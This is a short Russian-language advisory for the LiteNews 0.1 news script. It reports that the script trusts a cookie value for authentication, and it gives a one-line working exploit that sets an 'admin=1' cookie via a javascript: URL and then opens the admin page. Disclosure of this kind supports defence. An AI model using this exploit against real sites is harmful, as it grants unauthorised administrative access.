Программа: LiteNews 0.1

Уязвимость позволяет удаленному злоумышленнику обойти ограничения
безопасности на целевой системе. Уязвимость существует из-за ошибки в проверке
входных данных при обработке cookie. Эксплуатирование уязвимости приведет к
обходу механизма аутентификации на целевой системе.

Эксплоит:

javascript:document.cookie = "admin=1; path=/";

После выполнения javascript, используйте "/admin/index.php" & Refresh

Оставить мнение